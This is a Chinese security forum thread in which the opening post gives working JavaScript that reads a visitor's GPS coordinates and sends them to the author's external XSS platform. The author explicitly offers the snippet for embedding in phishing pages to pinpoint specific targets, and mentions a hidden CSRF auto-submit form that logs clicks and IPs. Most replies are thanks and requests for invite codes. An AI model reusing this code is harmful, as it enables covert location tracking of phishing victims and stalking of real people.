用户
搜索
  • TA的每日心情

    2018-7-8 19:32
  • 签到天数: 114 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    春秋认证√作家团颜值担当

    Rank: 7Rank: 7Rank: 7

    19

    主题

    390

    帖子

    3851

    魔法币
    收听
    1
    粉丝
    63
    注册时间
    2017-6-5

    i春秋认证秦春秋文阁i春秋签约作者

    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋认证 秦 春秋文阁 i春秋签约作者 楼主
    发表于 2018-2-3 10:57:14 37845152
    之前有表哥写过利用H5技术的GPS定位,也有其他表哥打造了个简易的专门利用H5获取GPS经纬度的平台。

    前者我代码测试存在一些未知原因,总是出问题。后者我觉得为了个GPS定位专门搭建个平台无必要,还需要自己的服务器,而多数人使用大概也仅限于偶尔配合钓鱼网站社工精确地理位置。

    总而言之对小白都不太友好,使用也不方便。

    Onls看了下代码原理,发现归根结底就是利用H5自带的GPS对象,通过JavaScript来获取和处理经纬度信息,那么我觉得,最适合的方式应该是像使用XSS平台打Cookie那样,将利用代码抽象成一段js外链,大家不用管它具体是如何执行的,只需要在自己的钓鱼页面中引入这段js外链即可,类似于大家平时XSS插的:<script src="https://xss.com/xss"></script>,不需要额外的特殊操作。

    XSS平台用法就不介绍了,我这用的是开源代码搭建在自己服务器的XSS平台,(支持http和https):https://0bug.cf

    1.png


    你们如果有自己常用的XSS平台的话,就去自己的XSS平台创建项目:

    代码:
    [JavaScript] 纯文本查看 复制代码
    function getLocation() //获取GPS定位方法
      {
      if (navigator.geolocation)
        {
        navigator.geolocation.getCurrentPosition(showPosition);
        }
      else{x.innerHTML="Geolocation is not supported by this browser.";}
      }
    function showPosition(position)
      {
    //alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
        (new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
    }
          
    getLocation();


    在XSS平台上创建项目的时候,设置两个参数:

    2.png


    完成之后将XSS平台生成的外链插入自己准备好的钓鱼页面中就行了,Demo:https://0bug.cf/gps.html (手机打开,电脑没有GPS)




    3.png

    只需要在使用的时候构造针对特定目标的钓鱼页面,然后插入同一段已生产好的JS外链就够了。会自动接受经纬度并邮件提醒,实测QQ\微信\各主流浏览器都成功。

    4.png

    -------------------------------------------分割线----------------------------------------------

    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:

    利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码,能知道对方点击了链接并且还能得到对方IP:

    游客,如果您要查看本帖隐藏内容请回复


    对CSRF不理解的可以看其他表哥关于这方面的文章,或者我这篇:


    [Onls丶辜釉渗透日常]花式实战助你理解CSRF

    如果自己没有XSS平台的,可以在本帖下面留言,我给你我平台的邀请码,不过为了保持稳定数量有限。






    评分

    参与人数 2积分 +50 魔法币 +13 收起 理由
    spirito + 3
    叶问 + 50 + 10 表哥能送一个邀请码吗

    查看全部评分

    本帖被以下淘专辑推荐:

    • · 思路|主题: 30, 订阅: 5
    信息安全菜鸟/社会主义接班人
    发表于 2018-8-20 17:44:26
    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:

    利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码,能知道对方点击了链接并且还能得到对方IP:
    使用道具 举报 回复
    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:

    利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码,能知道对方点击了链接并且还能得到对方IP:
    使用道具 举报 回复

    我IOS系统,我直接在手机上同意定位,然后直接打开你的那个HTML页面,发现定位到了大海里面,好像是黑海附近。
    是不是哪里写错了?
    我之前也想搞一个这样的,搞就像百度地图,高德类似这种定位,基本还凑合。
    因为我没有邀请码,直接用你的页面测试的,希望给个码子我再去测试一下。非常感谢。
    使用道具 举报 回复
    我IOS系统,我直接在手机上同意定位,然后直接打开你的那个HTML页面,发现定位到了大海里面,好像是黑海附近。
    是不是哪里写错了?
    我之前也想搞一个这样的,搞就像百度地图,高德类似这种定位,基本还凑合。
    因为我没有邀请码,直接用你的页面测试的,希望给个码子我再去测试一下。非常感谢。
    使用道具 举报 回复
    我IOS系统,我直接在手机上同意定位,然后直接打开你的那个HTML页面,发现定位到了大海里面,好像是黑海附近。
    是不是哪里写错了?
    我之前也想搞一个这样的,搞就像百度地图,高德类似这种定位,基本还凑合。
    因为我没有邀请码,直接用你的页面测试的,希望给个码子我再去测试一下。非常感谢。
    使用道具 举报 回复
    战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:

    利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码,能知道对方点击了链接并且还能得到对方IP:
    使用道具 举报 回复
    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:
    使用道具 举报 回复
    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2018-2-3 11:16:22
    谢谢大神分享,学习了
    使用道具 举报 回复
    发表于 2018-2-3 13:34:18
    表哥骚得不行。
    使用道具 举报 回复
    发表于 2018-2-3 13:43:48

    表哥骚得不行。
    使用道具 举报 回复
    感谢分享。。。。。。
    使用道具 举报 回复
    先收藏了,又是表哥的骚操作
    使用道具 举报 回复
    发表于 2018-2-3 19:20:14
    求邀请码
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋认证 秦 春秋文阁 i春秋签约作者
    8#
    发表于 2018-2-3 19:55:20

    7238729a8fec136a31fdf59c2e179816
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    发表于 2018-2-3 20:29:16
    看看啊啊                 
    使用道具 举报 回复
    发表于 2018-2-3 20:37:49
    收藏了 学习下
    使用道具 举报 回复
    网页从来不授权获取地理位置
    使用道具 举报 回复
    发表于 2018-2-3 22:08:47
    6666666666666666666666666666666666
    使用道具 举报 回复
    发表于 2018-2-4 19:14:51
    有没有跳转链接的xss代码
    使用道具 举报 回复
    发表于 2018-2-4 19:28:52
    感谢表格的分享
    你所浪费的今天,是昨天死去的人奢望的明天。
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册